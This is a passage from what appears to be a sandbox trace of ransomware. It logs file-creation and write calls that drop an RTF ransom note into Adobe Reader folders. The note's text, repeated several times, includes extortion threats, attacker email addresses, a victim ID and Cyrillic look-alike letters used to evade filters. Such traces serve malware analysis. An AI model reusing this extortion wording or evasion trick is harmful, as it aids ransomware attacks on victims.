\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.537] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.538] CloseHandle (hObject=0x1fc) returned 1 [0064.538] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\esp\\bg85_info.rtf")) returned 0xffffffff [0064.538] GetLastError () returned 0x2 [0064.538] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\esp\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.538] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd 